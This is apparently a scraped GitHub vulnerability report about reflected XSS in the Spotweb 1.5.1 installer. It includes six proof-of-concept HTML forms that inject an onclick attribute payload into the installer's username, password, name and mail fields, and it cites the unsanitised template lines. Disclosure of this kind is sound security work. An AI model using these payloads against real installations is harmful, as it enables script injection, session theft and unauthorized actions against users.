Reflected Cross-Site Scripting (XSS) may allow an attacker to execute JavaScript code in the context of the victim’s browser.
Note that these multiple XSS vulnerabilities exist in the spotweb.
Have you searched the internet or Github for an answer?
Not related
To Reproduce
Steps to reproduce the behavior:
Go to the installation page
Complete the configuration including DB connection => goto step 4
Access each page of these HTML files.
Exploit 1 - exploit username parameter
<html><formmethod="POST" action="http://[localhost]/spotweb/install.php?page=4"><inputname='settingsform[username]' value="1' onclick='alert(1)"><button>Send my greetings</button></form></html>
Exploit 2 - exploit newpassword1 parameter
<html><formmethod="POST" action="http://[localhost]/spotweb/install.php?page=4"><inputname='settingsform[newpassword1]' value="1' onclick='alert(1)"><button>Send my greetings</button></form></html>
Exploit 3 - exploit newpassword2 parameter
<html><formmethod="POST" action="http://[localhost]/spotweb/install.php?page=4"><inputname='settingsform[newpassword2]' value="1' onclick='alert(1)"><button>Send my greetings</button></form></html>
Exploit 4 - exploit firstname parameter
<html><formmethod="POST" action="http://[localhost]/spotweb/install.php?page=4"><inputname='settingsform[firstname]' value="1' onclick='alert(1)"><button>Send my greetings</button></form></html>
Exploit 5 - exploit lastname parameter
<html><formmethod="POST" action="http://[localhost]/spotweb/install.php?page=4"><inputname='settingsform[lastname]' value="1' onclick='alert(1)"><button>Send my greetings</button></form></html>
Exploit 6 - exploit mail parameter
<html><formmethod="POST" action="http://[localhost]/spotweb/install.php?page=4"><inputname='settingsform[mail]' value="1' onclick='alert(1)"><button>Send my greetings</button></form></html>
Click each text field
Boom!
Expected behavior
This may lead to unauthorized actions being performed, unauthorized access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim.
Screenshots
Desktop (please complete the following information):
(server) OS: ubuntu
(client) OS: window
Browser chrome
Spotweb Version 1.5.1 and below versions
Which branch Develop and Master
PHP version 7.1
Additional context
The code below displays the user-controlled parameter username, newpassword1, newpassword2, firstname, lastname and mail with incorrect sanitization:
Yes, you are right. However, remember that XSS vulnerabilities that occur during the installation process are also vulnerabilities.
For example, in CVE-2021-37389, CVE-2014-9571, CVE-2020-26043, CVE-2020-18670, etc., you can see the vendors acknowledging that there are vulnerabilities.
Describe the bug/issue
Have you searched the internet or Github for an answer?
To Reproduce
Steps to reproduce the behavior:
Exploit 1 - exploit
usernameparameterExploit 2 - exploit
newpassword1parameterExploit 3 - exploit
newpassword2parameterExploit 4 - exploit
firstnameparameterExploit 5 - exploit
lastnameparameterExploit 6 - exploit
mailparameterExpected behavior
Screenshots

Desktop (please complete the following information):
Additional context
The code below displays the user-controlled parameter
username,newpassword1,newpassword2,firstname,lastnameandmailwith incorrect sanitization:spotweb/templates/installer/step-004.inc.php
Line 41 in be2ab76
spotweb/templates/installer/step-004.inc.php
Line 46 in be2ab76
spotweb/templates/installer/step-004.inc.php
Line 51 in be2ab76
spotweb/templates/installer/step-004.inc.php
Line 56 in be2ab76
spotweb/templates/installer/step-004.inc.php
Line 61 in be2ab76
spotweb/templates/installer/step-004.inc.php
Line 66 in be2ab76
The text was updated successfully, but these errors were encountered: